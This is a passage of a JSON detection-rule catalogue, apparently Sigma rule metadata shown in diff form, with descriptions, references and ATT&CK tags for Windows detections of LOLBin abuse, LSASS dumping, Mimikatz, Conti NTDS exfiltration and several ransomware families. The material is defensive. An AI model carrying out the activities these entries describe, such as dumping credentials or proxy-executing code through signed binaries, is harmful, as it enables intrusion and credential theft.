"level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "value": "Use of TTDInject.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_ttdinject.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "value": "Time Travel Debugging Utility Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", - "value": "UtilityFunctions.ps1 Proxy Dll", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/05/28", - "filename": "proc_creation_win_lolbin_utilityfunctions.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in 
Microsoft's recommended block rules.", - "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "value": "Use of VisualUiaVerifyNative.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", - "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate testing of Microsoft UI parts." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "value": "Visual Basic Command Line Compiler Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", - "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", - "level": "high", - "falsepositive": [ - "Utilization of this tool should not be seen in enterprise environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", - "uuid": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", - "value": "Use of VSIISExeLauncher.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "uuid": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", - 
"value": "Use of Wfc.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_lolbin_wfc.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate use by a software developer" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "value": "Winword LOLBIN Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", - "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/05/17", - "filename": "proc_creation_win_lolbin_winword.yml", - "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "value": "Wlrmdr Lolbin Use as Launcher", - "meta": { - "refs": [ - 
"https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/02/16", - "filename": "proc_creation_win_lolbin_wlrmdr.yml", - "author": "frack113, manasmbellani", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Too long PowerShell command lines", - "uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "value": "Too Long PowerShell Commandlines", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_win_long_powershell_commandline.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_lsass_dump.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", - "value": "Suspicious PowerShell Mailbox Export to Share", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2021/08/07", - "filename": "proc_creation_win_mailboxexport_share.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to find volume shadow backups", - "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "value": "Conti Volume Shadow Listing", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" - ], - "tags": [ - "attack.t1587.001", - "attack.resource_development" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command used by conti to exfiltrate NTDS", - "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", - "value": "Conti NTDS Exfiltration Command", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti_7zip.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "value": "Sensitive Registry Access via Volume Shadow Copy", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - 
], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti_shadowcopy.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Some rare backup scenarios" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects typical Dridex process patterns", - "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "value": "Dridex Process Pattern", - "meta": { - "refs": [ - "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "creation_date": "2019/01/10", - "filename": "proc_creation_win_malware_dridex.yml", - "author": "Florian Roth, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process parameters as seen in DTRACK infections", - "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "value": "DTRACK Process Creation", - "meta": { - "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_malware_dtrack.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects all Emotet like process executions 
that are not covered by the more generic rules", - "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "value": "Emotet Process Creation", - "meta": { - "refs": [ - "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/09/30", - "filename": "proc_creation_win_malware_emotet.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", - "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "value": "Formbook Process Creation", - "meta": { - "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", - "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", - "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2019/09/30", - "filename": "proc_creation_win_malware_formbook.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", - "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", - "value": "NotPetya Ransomware Activity", - "meta": { - "refs": [ - "https://securelist.com/schroedingers-petya/78870/", - "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.t1070.001", - "attack.credential_access", - "attack.t1003.001", - "car.2016-04-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_malware_notpetya.yml", - "author": "Florian Roth, Tom Ueltschi", - "level": "critical", - "falsepositive": [ - "Admin activity" - ], - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects QBot like process executions", - "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "value": "QBot Process Creation", - "meta": { - "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", - "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2019/10/01", - "filename": "proc_creation_win_malware_qbot.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Ryuk ransomware activity", - "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", - "value": "Ryuk Ransomware", - "meta": { - "refs": [ - "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/12/16", - "filename": "proc_creation_win_malware_ryuk.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wscript/cscript executions of scripts located in user directories", - "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", - "value": "WScript or CScript Dropper", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": 
"proc_creation_win_malware_script_dropper.yml", - "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Winzip", - "Other self-extractors" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", - "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", - "value": "Trickbot Malware Recon Activity", - "meta": { - "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2019/12/28", - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", - "author": "David Burkett, Florian Roth", - "level": "critical", - "falsepositive": [ - "Rare System Admin Activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", - "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "value": "Trickbot Malware Activity", - "meta": { - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559" - ], - "creation_date": "2020/11/26", - "filename": "proc_creation_win_malware_trickbot_wermgr.yml", - "author": "Florian Roth", - "level": 
"high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WannaCry ransomware activity", - "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", - "value": "WannaCry Ransomware", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_malware_wannacry.yml", - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "value": "Adwind RAT / JRAT", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2017/11/10", - "filename": "proc_creation_win_mal_adwind.yml", - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect system changes made by Blue Mockingbird", - "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "value": "Blue Mockingbird", - "meta": { - "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" - ], - "creation_date": "2020/05/14", - "filename": "proc_creation_win_mal_blue_mockingbird.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects DarkSide Ransomware and helpers", - "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", - "value": "DarkSide Ransomware Pattern", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2021/05/14", - "filename": "proc_creation_win_mal_darkside_ransomware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown", - "UAC bypass method used by other malware" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", - "value": "Hermetic 
Wiper TG Process Patterns", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/02/25", - "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects LockerGoga Ransomware command line.", - "uuid": "74db3488-fd28-480a-95aa-b7af626de068", - "value": "LockerGoga Ransomware", - "meta": { - "refs": [ - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", - "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", - "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", - "author": "Vasiliy Burov, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Ryuk Ransomware command lines", - "uuid": "0acaad27-9f02-4136-a243-c357202edd74", - "value": "Ryuk Ransomware Command Line Activity", - "meta": { - "refs": [ - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" - ], - "tags": [ - "attack.execution", - 
"attack.t1204" - ], - "creation_date": "2019/08/06", - "filename": "proc_creation_win_mal_ryuk.yml", - "author": "Vasiliy Burov", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", - "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "value": "Suspicious Usage of the Manage-bde.wsf Script", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://twitter.com/bohops/status/980659399495741441", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_manage_bde_lolbas.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "uuid": "15619216-e993-4721-b590-4c520615a67d", - "value": "Meterpreter or Cobalt Strike Getsystem Service Start", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" - ], - 
"tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "high", - "falsepositive": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection well-known mimikatz command line arguments", - "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "value": "Mimikatz Command Line", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_mimikatz_command_line.yml", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", - "level": "medium", - "falsepositive": [ - "Legitimate 